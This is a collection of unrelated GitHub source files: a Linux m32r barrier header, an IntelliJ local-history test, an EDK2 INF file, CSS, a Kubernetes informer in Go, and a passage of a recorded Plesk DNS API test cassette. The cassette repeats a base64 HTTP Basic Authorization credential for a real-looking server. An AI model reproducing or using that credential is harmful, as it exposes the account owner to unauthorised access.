}
return old;
}
/*
* cmpxchg_local and cmpxchg64_local are atomic wrt current CPU. Always make
* them available.
*/
#define cmpxchg_local(ptr, o, n) \
((__typeof__(*(ptr)))__cmpxchg_local((ptr), (unsigned long)(o), \
(unsigned long)(n), sizeof(*(ptr))))
#define cmpxchg64_local(ptr, o, n) __cmpxchg64_local_generic((ptr), (o), (n))
#endif /* __KERNEL__ */
/*
* Memory barrier.
*
* mb() prevents loads and stores being reordered across this point.
* rmb() prevents loads being reordered across this point.
* wmb() prevents stores being reordered across this point.
*/
#define mb() barrier()
#define rmb() mb()
#define wmb() mb()
/**
* read_barrier_depends - Flush all pending reads that subsequents reads
* depend on.
*
* No data-dependent reads from memory-like regions are ever reordered
* over this barrier. All reads preceding this primitive are guaranteed
* to access memory (but not necessarily other CPUs' caches) before any
* reads following this primitive that depend on the data return by
* any of the preceding reads. This primitive is much lighter weight than
* rmb() on most CPUs, and is never heavier weight than is
* rmb().
*
* These ordering constraints are respected by both the local CPU
* and the compiler.
*
* Ordering is not guaranteed by anything other than these primitives,
* not even by data dependencies. See the documentation for
* memory_barrier() for examples and URLs to more information.
*
* For example, the following code would force ordering (the initial
* value of "a" is zero, "b" is one, and "p" is "&a"):
*
* <programlisting>
* CPU 0 CPU 1
*
* b = 2;
* memory_barrier();
* p = &b; q = p;
* read_barrier_depends();
* d = *q;
* </programlisting>
*
*
* because the read of "*q" depends on the read of "p" and these
* two reads are separated by a read_barrier_depends(). However,
* the following code, with the same initial values for "a" and "b":
*
* <programlisting>
* CPU 0 CPU 1
*
* a = 2;
* memory_barrier();
* b = 3; y = b;
* read_barrier_depends();
* x = a;
* </programlisting>
*
* does not enforce ordering, since there is no data dependency between
* the read of "a" and the read of "b". Therefore, on some CPUs, such
* as Alpha, "y" could be set to 3 and "x" to 0. Use rmb()
* in cases like this where there are no data dependencies.
**/
#define read_barrier_depends() do { } while (0)
#ifdef CONFIG_SMP
#define smp_mb() mb()
#define smp_rmb() rmb()
#define smp_wmb() wmb()
#define smp_read_barrier_depends() read_barrier_depends()
#define set_mb(var, value) do { (void) xchg(&var, value); } while (0)
#else
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; barrier(); } while (0)
#endif
#define arch_align_stack(x) (x)
#endif /* _ASM_M32R_SYSTEM_H */
| {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.history.integration;
import com.intellij.history.LocalHistory;
import com.intellij.history.core.revisions.Revision;
import com.intellij.history.utils.RunnableAdapter;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.command.CommandProcessor;
import com.intellij.openapi.util.ThrowableComputable;
import com.intellij.openapi.vfs.JarFileSystem;
import com.intellij.openapi.vfs.LocalFileSystem;
import com.intellij.openapi.vfs.VirtualFile;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;
import static org.assertj.core.api.Assertions.assertThat;
public class BasicsTest extends IntegrationTestCase {
public void testProcessingCommands() {
final VirtualFile[] f = new VirtualFile[1];
ApplicationManager.getApplication().runWriteAction(() -> CommandProcessor.getInstance().executeCommand(myProject, new RunnableAdapter() {
@Override
public void doRun() throws IOException {
f[0] = createChildData(myRoot, "f1.txt");
f[0].setBinaryContent(new byte[]{1});
f[0].setBinaryContent(new byte[]{2});
}
}, "name", null));
assertThat(getRevisionsFor(f[0])).hasSize(2);
}
public void testPuttingUserLabel() {
VirtualFile f = createChildData(myRoot, "f.txt");
LocalHistory.getInstance().putUserLabel(myProject, "global");
assertEquals(3, getRevisionsFor(f).size());
assertThat(getRevisionsFor(myRoot)).hasSize(4);
LocalHistory.getInstance().putUserLabel(myProject, "file");
List<Revision> rr = getRevisionsFor(f);
assertEquals(4, rr.size());
assertEquals("file", rr.get(1).getLabel());
assertEquals(-1, rr.get(1).getLabelColor());
assertEquals("global", rr.get(2).getLabel());
assertEquals(-1, rr.get(2).getLabelColor());
}
public void testPuttingSystemLabel() {
VirtualFile f = createChildData(myRoot, "file.txt");
assertEquals(2, getRevisionsFor(f).size());
assertEquals(3, getRevisionsFor(myRoot).size());
LocalHistory.getInstance().putSystemLabel(myProject, "label");
List<Revision> rr = getRevisionsFor(f);
assertEquals(3, rr.size());
assertEquals("label", rr.get(1).getLabel());
rr = getRevisionsFor(myRoot);
assertEquals(4, rr.size());
assertEquals("label", rr.get(1).getLabel());
}
public void testPuttingLabelWithUnsavedDocuments() {
VirtualFile f = createChildData(myRoot, "f.txt");
setContent(f, "1");
setDocumentTextFor(f, "2");
LocalHistory.getInstance().putSystemLabel(myProject, "label");
setDocumentTextFor(f, "3");
LocalHistory.getInstance().putUserLabel(myProject, "label");
setDocumentTextFor(f, "4");
LocalHistory.getInstance().putUserLabel(myProject, "label");
List<Revision> rr = getRevisionsFor(f);
assertEquals(9, rr.size()); // 5 changes + 3 labels
assertEquals("4", new String(rr.get(0).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("4", new String(rr.get(1).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("3", new String(rr.get(2).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("3", new String(rr.get(3).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("2", new String(rr.get(4).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("2", new String(rr.get(5).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("1", new String(rr.get(6).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("", new String(rr.get(7).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
}
public void testDoNotRegisterSameUnsavedDocumentContentTwice() {
VirtualFile f = createChildData(myRoot, "f.txt");
setContent(f, "1");
setDocumentTextFor(f, "2");
LocalHistory.getInstance().putSystemLabel(myProject, "label");
LocalHistory.getInstance().putUserLabel(myProject, "label");
List<Revision> rr = getRevisionsFor(f);
assertEquals(6, rr.size()); // 3 changes + 2 labels
assertEquals("2", new String(rr.get(0).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("2", new String(rr.get(1).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("2", new String(rr.get(2).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("1", new String(rr.get(3).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
assertEquals("", new String(rr.get(4).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
}
public void testIsUnderControl() {
VirtualFile f1 = createChildData(myRoot, "file.txt");
VirtualFile f2 = createChildData(myRoot, "file." + FileListeningTest.IGNORED_EXTENSION);
assertTrue(LocalHistory.getInstance().isUnderControl(f1));
assertFalse(LocalHistory.getInstance().isUnderControl(f2));
}
public void testDoNotRegisterChangesNotInLocalFS() throws Exception {
File f = new File(myRoot.getPath(), "f.jar");
ApplicationManager.getApplication().runWriteAction((ThrowableComputable<Object, IOException>)() -> {
try (JarOutputStream jar = new JarOutputStream(new FileOutputStream(f))) {
jar.putNextEntry(new JarEntry("file.txt"));
jar.write(1);
jar.closeEntry();
}
return null;
});
VirtualFile vfile = LocalFileSystem.getInstance().refreshAndFindFileByIoFile(f);
assertNotNull(vfile);
VirtualFile jarRoot = JarFileSystem.getInstance().getJarRootForLocalFile(vfile);
assertEquals(1, jarRoot.findChild("file.txt").contentsToByteArray()[0]);
assertThat(getRevisionsFor(myRoot)).hasSize(3);
ApplicationManager.getApplication().runWriteAction((ThrowableComputable<Object, IOException>)() -> {
try (JarOutputStream jar = new JarOutputStream(new FileOutputStream(f))) {
JarEntry e = new JarEntry("file.txt");
e.setTime(f.lastModified() + 10000);
jar.putNextEntry(e);
jar.write(2);
jar.closeEntry();
}
f.setLastModified(f.lastModified() + 10000);
return null;
});
LocalFileSystem.getInstance().refreshWithoutFileWatcher(false);
JarFileSystem.getInstance().refreshWithoutFileWatcher(false);
jarRoot = JarFileSystem.getInstance().getJarRootForLocalFile(vfile);
assertThat((int)jarRoot.findChild("file.txt").contentsToByteArray()[0]).isEqualTo(2);
assertThat(getRevisionsFor(myRoot)).hasSize(3);
assertThat(getRevisionsFor(jarRoot)).hasSize(3);
}
}
| {
"pile_set_name": "Github"
} |
## @file
#
# Stateful, implicitly initialized fw_cfg library.
#
# Copyright (C) 2013, Red Hat, Inc.
# Copyright (c) 2008 - 2012, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2017, AMD Incorporated. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
[Defines]
INF_VERSION = 0x00010005
BASE_NAME = QemuFwCfgPeiLib
FILE_GUID = ddd4f5f0-5304-42a8-9efa-d14bf11a3533
MODULE_TYPE = BASE
VERSION_STRING = 1.0
LIBRARY_CLASS = QemuFwCfgLib|PEIM
CONSTRUCTOR = QemuFwCfgInitialize
#
# The following information is for reference only and not required by the build tools.
#
# VALID_ARCHITECTURES = IA32 X64
#
[Sources]
QemuFwCfgLibInternal.h
QemuFwCfgLib.c
QemuFwCfgPei.c
[Packages]
MdePkg/MdePkg.dec
OvmfPkg/OvmfPkg.dec
[LibraryClasses]
BaseLib
BaseMemoryLib
DebugLib
IoLib
MemoryAllocationLib
MemEncryptSevLib
| {
"pile_set_name": "Github"
} |
ui|cursor {
display: block;
position: absolute;
width: 0;
height: 0;
overflow: visible;
z-index: 4; /* why this much needed? */
margin-top: 16px;
margin-left: 16px;
width: 24px;
height: 24px;
top: -100px;
left: -100px;
}
ui|cursor ui|labelbox.indicator {
position: relative;
top: -10px;
left: 6px;
} | {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by informer-gen. DO NOT EDIT.
package v1
import (
"context"
time "time"
appsv1 "k8s.io/api/apps/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
watch "k8s.io/apimachinery/pkg/watch"
internalinterfaces "k8s.io/client-go/informers/internalinterfaces"
kubernetes "k8s.io/client-go/kubernetes"
v1 "k8s.io/client-go/listers/apps/v1"
cache "k8s.io/client-go/tools/cache"
)
// ReplicaSetInformer provides access to a shared informer and lister for
// ReplicaSets.
type ReplicaSetInformer interface {
Informer() cache.SharedIndexInformer
Lister() v1.ReplicaSetLister
}
type replicaSetInformer struct {
factory internalinterfaces.SharedInformerFactory
tweakListOptions internalinterfaces.TweakListOptionsFunc
namespace string
}
// NewReplicaSetInformer constructs a new informer for ReplicaSet type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewReplicaSetInformer(client kubernetes.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers) cache.SharedIndexInformer {
return NewFilteredReplicaSetInformer(client, namespace, resyncPeriod, indexers, nil)
}
// NewFilteredReplicaSetInformer constructs a new informer for ReplicaSet type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewFilteredReplicaSetInformer(client kubernetes.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers, tweakListOptions internalinterfaces.TweakListOptionsFunc) cache.SharedIndexInformer {
return cache.NewSharedIndexInformer(
&cache.ListWatch{
ListFunc: func(options metav1.ListOptions) (runtime.Object, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.AppsV1().ReplicaSets(namespace).List(context.TODO(), options)
},
WatchFunc: func(options metav1.ListOptions) (watch.Interface, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.AppsV1().ReplicaSets(namespace).Watch(context.TODO(), options)
},
},
&appsv1.ReplicaSet{},
resyncPeriod,
indexers,
)
}
func (f *replicaSetInformer) defaultInformer(client kubernetes.Interface, resyncPeriod time.Duration) cache.SharedIndexInformer {
return NewFilteredReplicaSetInformer(client, f.namespace, resyncPeriod, cache.Indexers{cache.NamespaceIndex: cache.MetaNamespaceIndexFunc}, f.tweakListOptions)
}
func (f *replicaSetInformer) Informer() cache.SharedIndexInformer {
return f.factory.InformerFor(&appsv1.ReplicaSet{}, f.defaultInformer)
}
func (f *replicaSetInformer) Lister() v1.ReplicaSetLister {
return v1.NewReplicaSetLister(f.Informer().GetIndexer())
}
| {
"pile_set_name": "Github"
} |
interactions:
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<site>\n\t\t<get>\n\t\t\t<filter>\n\t\t\t\t<name>lexicon-test.com</name>\n\
\t\t\t</filter>\n\t\t\t<dataset></dataset>\n\t\t</get>\n\t</site>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['173']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <site>\n <get>\n <result>\n \
\ <status>ok</status>\n <filter-id>lexicon-test.com</filter-id>\n\
\ <id>71</id>\n <data/>\n </result>\n </get>\n </site>\n\
</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['259']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:42 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n </get_rec>\n </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8606']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:42 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<add_rec>\n\t\t\t<site-id>71</site-id>\n\t\t\t<type>TXT</type>\n\
\t\t\t<host>delete.testfull</host>\n\t\t\t<value>challengetoken</value>\n\t\t\
\t<opt></opt>\n\t\t</add_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['222']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <add_rec>\n <result>\n \
\ <status>ok</status>\n <id>4921</id>\n </result>\n </add_rec>\n\
\ </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['203']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
